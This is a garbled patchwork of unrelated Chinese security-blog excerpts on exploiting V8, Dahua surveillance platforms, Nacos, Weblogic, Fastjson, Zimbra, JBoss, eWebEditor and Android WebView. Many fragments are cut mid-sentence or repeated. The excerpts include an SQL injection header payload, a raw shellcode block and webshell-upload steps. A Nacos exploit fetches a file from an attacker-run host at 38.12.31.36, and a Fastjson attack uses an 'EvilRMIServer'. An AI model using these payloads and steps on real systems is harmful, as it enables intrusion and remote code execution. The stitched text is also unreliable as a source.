作者:Hcamael@知道创宇404实验室 相关阅读:从 0 开始学 V8 漏洞利用之环境搭建(一) 经过一段时间的研究,先进行一波总结,不过因为刚开始研究没多久,也许有一些局限性,以后如果发现了,再进行修正 概述 我认为,在搞漏洞利用前都得明确目标。比如打CTF做二进制的题目,大部分情况下,目标都是执行system(/bin/sh)或者execve(/bin/sh,0,0)。 接下来将会根据该逻辑来反向总结一波v8的利用过程。 调试V8程序 在总结v8的利用之前,先简单说说v8的调试。 WASM 现如今的浏览器基本都支持WASM,v8会专门生成一段rwx内存供WASM使用,这就给了我们利用的机会。 任意读写 最近我研究的几个V8的漏洞,任意读写都是使用的一个套路,目前我是觉得这个套路很通用的,感觉V8相关的利用都是用这类套路。
项目介绍 此项目主要用于在授权情况下对大华系列产品进行漏洞检测 漏洞支持 大华综合漏洞利用工具 收录漏洞如下: 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 大华DSS数字监控系统itcBulletin注入漏洞 大华智慧园区综合管理平台信息泄露漏洞 大华智慧园区综合管理平台getNewStaypointDetailQuery 任意文件上传漏洞 大华智慧园区综合管理平台emap任意文件上传漏洞 大华智慧园区综合管理平台searchJson注入漏洞 大华DSS数字监控系统attachment_getAttList.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 根据程序版本优化,添加新版本的Poc webshell利用模块 大华智慧园区综合管理平台poi任意文件上传漏洞 大华智慧园区综合管理平台video任意文件上传漏洞 ,即可开始检测 cmdshell模块 选择模块进行漏洞验证,如果存在,在cmdshell输入你要执行的命令即可 webshell利用模块: 内置Godzilla Behinder jspcmdshell
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XFF漏洞 X-Forwarded-For(XFF) 利用方式 1.绕过服务器过滤 2 X-Forwarded-For: client1, proxy1, proxy2, proxy3 //浏览器IP,第一个代理服务器,第二个三个四个等等 利用方式 1.绕过服务器过滤 XFF漏洞也称为IP 的header头部注入原理一样,服务器端会对XFF信息进行记录, 但没有进行过滤处理,就容易导致sql注入的产生 X-Forwarded-for: 127.0.0.1' and 1=1# 然后进一步利用
介绍 去年,英国国家网络安全中心(NCSC)报告了一个V8编译器中存在的安全漏洞,随后Google便悄悄修复了该漏洞。这个漏洞ID为1003286,漏洞的具体信息可以点击【阅读原文】获取。 根据漏洞报告的描述,这是一个空指针解除引用DoS漏洞,这个漏洞是一个不可利用的漏洞,并且只能通过WASM代码来触发。 在深入分析之后,我们发现这里还有另一种触发该漏洞的方式,并且能够通过V8 JIT编译器进程来利用该漏洞实现攻击。 在这篇文章中,我们将会介绍该漏洞的利用技术细节,并演示如何利用该漏洞实现远程代码执行。 漏洞利用 虽然这个漏洞存在于V8 JIT编译器之中,但它跟其他常见的JIT编译器漏洞有很大不同。为了成功利用该漏洞,我们需要生成能够利用初始漏洞的漏洞代码,然后利用它们来实现远程代码执行。
Nebula EK包中对CVE-2016-0189的漏洞利用,比其它漏洞利用包的漏洞利用方有了一定改进,这里进行一下深入分析。 本文试图利用windbg来分析漏洞利用时的内存布局,使得读者对该漏洞利用有更深刻的理解。 2. CVE-2016-0189的关键知识点 CVE-2016-0189是个关于VBScript的漏洞。 这似乎并没有太大问题,然而我们看一下漏洞利用脚本的valueOf函数 ? 这里脚本并未实现任意值的写入,然而并不影响漏洞的利用。 最后我们看一下,整个漏洞利用是如何工作的: 1)首先,创建一个 对象,通过上述的方法(1) 泄露该对象的地址; 2) 在该对象偏移为8的地方,利用方法(2)读取内存获取CSession对象指针; 3)然后在
x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\ xc9" "\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\ xe4\x4f" "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8" "\x7e\x72\xda\x73\xd2\x67\x69\xf1 \xfb\x88\xda\xbc\xdd\xa7" "\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" "\xd8\xa5\x68\ x0e\x8d\x12\x16\x6a" "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3" "\xe0\xfd\xa4\xcc\xc2 \x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8" "\
[TOC] 很多dns探测工具,都会首先尝试dns区域传送,然后才是暴力枚举,那么什么是DNS区域传送漏洞呢? 区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的zone数据库。 使用dig工具可以检测dns 区域传送漏洞,语法如下: dig axfr @域名服务器 被检测域名 示例: root@kali-xuanhun:~# dig @wormhole.movie.edu movie.edu in-addr.arpa.zonetransfer.me. 7200 IN PTR www.zonetransfer.me. ipv6actnow.org.zonetransfer.me. 7200 IN AAAA 2001:67c:2e8:
poc检测 FoFa: app="nacos" bp8080监听需要开启 首先我们利用压缩包中的service.py,将它上传到38.12.31.36的机器上,然后在上传到的目标文件夹输入python service.py启动服务 再利用压缩包中的nacos RCE漏洞POC.py 在压缩包目录下输入cmd然后按下回车 在cmd中输入python nacosRCE漏洞POC.py 按下回车会出现一个三角尖 ,在三角处粘贴url路径 按下回车后便会自行开启检测 此poc可以将windows和linux系统都检测到 mstsc远程桌面连接windows 当我们利用漏洞检测工具检测到windows主机时 我们便可以利用压缩包中的
成功反弹 CVE-2019-2618 漏洞简述 利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台 该漏洞有两个利用手法 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 DNSLOG的使用 DNSLOG可以在某些无法直接利用漏洞获得回显的情况下, 但是目标可以发起DNS 首先需要构造一个XML文件,并将其保存外网(漏洞机或者可访问的一台机子上)上 XML文件: <?xml version="1.0" encoding="UTF-<em>8</em>" ? ssrf漏洞 漏洞描述 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。 如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。 Github项目地址: https://github.com/pmiaowu/BurpFastJsonScan 02、简化攻击步骤 在这里我们可以使用一款JNDI服务利用工具,来简化fastjson 漏洞检测的步骤,辅助漏洞利用和渗透。 Github项目地址: https://github.com/wyzxxz/jndi_tool Fstjson漏洞利用: (1)开启RMI服务 java -cp jndi_tool.jar jndi.EvilRMIServer 537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: application/json;charset=UTF-8
前言 近期在测试一个目标的时候发现对方好几个zimbra的服务器,按照网上提供的利用方法测试了之后发现利用不成功!接着自己搭建了zimbra在自己进行测试之后成功利用并且拿下zimbra服务器! 7) zimbra-proxy: Enabled 8) 接着利用刚刚获取到的高权限的TOKEN 来进行文件上传,把webshell上传上去! 实战 zimbra RCE 复现这个漏洞主要就是遇到了这个邮箱服务器!并且存在XXE读取文件!前面的准备都是为了这一刻!!!!! 首先获取它的数据包,利用了CVE-2019-9670 XXE漏洞来读取配置文件。Zimbra配置文件位置为/conf/localconfig.xml。
IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 信道的定义字段主要是名字加上配置,配置主要包括了优先级等 在server 目的是将访问从服务器重定向到客户端文件系统,其数据头部将会主要是两种标识和PacketId字段组成: 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 在完全建立连接后,将会创建 IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: 可是在windowsxp中,直接发送 %E5%B9%B4%E5%86%85%E6%A0%B8%E5%A0%86%E9%A3%8E%E6%B0%B4%EF%BC%9A%20%E2%80%9CBig%20Kids%E2%80%99%20Pool %E2%80%9D%E4%B8%AD%E7%9A%84%E5%A0%86%E5%96%B7%E6%8A%80%E6%9C%AF.html
IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 ? 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 ? 在完全建立连接后,将会创建rdpdr信道的结构体 ? 占位被free的实际数据大小为0x128,利用的中转地址是0xfffffa80ec000948 ? %E5%B9%B4%E5%86%85%E6%A0%B8%E5%A0%86%E9%A3%8E%E6%B0%B4%EF%BC%9A%20%E2%80%9CBig%20Kids%E2%80%99%20Pool %E2%80%9D%E4%B8%AD%E7%9A%84%E5%A0%86%E5%96%B7%E6%8A%80%E6%9C%AF.html
影响版本 Jboss4.x以下 漏洞利用 输⼊url http://目标IP:8080/jmx-console/HtmlAdaptor? ;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8; CVE-2006-5750漏洞利用methodIndex进行store()方法的调用。 若访问200,则可能存在漏洞。 ? 此处我们使用JavaDeserH2HC工具来利用该漏洞,尝试直接弹回一个shell javac -cp . 漏洞利用 首先从http响应头和title中一般情况下都能看到信息来确定目标 jboss 版本是否在此漏洞版本范围 ? 现成工具 ?
8、session欺骗漏洞! 适用于一些设置不当的虚拟主机。当旁注得到一个webshell,而目标站存在ewebeditor却不能找到密码的时候可以尝试欺骗进入后台! 4、说说漏洞基本利用步骤,还以asp为例! 登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。. 先贴漏洞利用方式! 这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法! 漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..
利用Android WebView漏洞 0x00 说明 测试程序来源: https://github.com/t4kemyh4nd/vulnwebview 可以直接下载app.apk进行测试 下载安装后打开长下面的样子 0x02 导出的WebView 利用导出的WebView,可以进行WebView劫持,常见的就是开放重定向漏洞,利用条件webview所在的Activity需要是导出的 如何判断导出,有两种方式: 显示的声明 利用: 可以使用adb进行利用,传输参数打开恶意网页。 分析代码: 上面代码已经开启了选项 利用: 尝试读取本地文件存储的登录信息。 Android WebView 漏洞
Nacos RCE 漏洞检测与利用教程Poc检测FoFa 搜索语法:app="nacos"准备工作:开启 BP8080 监听上传 service.py 到攻击机 (38.12.31.36)在目标目录执行 :python service.py图片漏洞检测:在压缩包目录打开 CMD图片执行检测命令:python nacosRCE漏洞POC.py图片粘贴目标 URL 路径图片自动检测结果图片该 POC 可同时检测 Windows/Linux 系统Windows 系统利用 (mstsc)检测到 Windows 主机:图片执行 EXP:运行:python exp.py图片输入目标 URL(格式:http://x.x.x.x /hello.txt http://38.12.31.36:8000/hello.txt图片验证下载成功图片图片漏洞利用工具下载 工具下载链接 内容结束
作者:Hcamael@知道创宇404实验室 最近因为某些原因开始学V8的漏洞利用,所以打算写一个系列的文章来记录一下我的学习过程。 我是打算学V8的漏洞利用,不用的漏洞版本基本都会有区别,总不可能研究一个就花1h左右的时间在编译上吧。 这个命令会把v8克隆下来,v8挺大的,所以这个命令的速度视网络情况而定 安装v8相关的依赖,字体依赖就算用代理也会遇到一些网络问题,但是我目前没有研究字体类的漏洞,我就没有去解决这个问题,所以直接不装字体的依赖 ' ninja -C out/x64.release d8 如果编译出来的v8环境需要迁移,建议设置v8_monolithic=true,这样只需要迁移一个d8程序就好了。 " WORKDIR /v8 COPY /v8_$V8_VERSION/d8 ./ COPY vimrc /root/.vimrc COPY entrypoint.sh / RUN chmod +
作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 我是从starctf 2019的一道叫 FreeBuf上有一篇《从一道CTF题零基础学V8漏洞利用》(https://www.freebuf.com/vuls/203721.html),我觉得对初学者挺友好的,我就是根据这篇文章开始入门v8的漏洞利用 =false goma_dir="None" v8_enable_backtrace=true v8_enable_disassembler=true v8_enable_object_print=true 漏洞点 源码我就不分析了,因为这题是人为造洞,在obb.diff中,给变量添加了一个oob函数,这个函数可以越界读写64bit。 因为模板是按照新版的v8来写的,新版的v8对地址都进行了压缩,但是该题的v8没有对地址进行压缩,所以还有一些地方需要进行调整: 首先是读写函数,因为map地址占64bit,长度占64bit,所以elements
它还会扫描DOM XSS漏洞。 DOM扫描 --headers //提供HTTP标头 -d, --delay //设置延迟 实例 为了测试该工具的实用性,笔者写了一个简单的存在XSS漏洞的 我们利用工具Fuzzing出来的payload进行一下测试,测试结果如下图所示: ? *本文作者:看不尽的尘埃,转载请注明来自FreeBuf.COM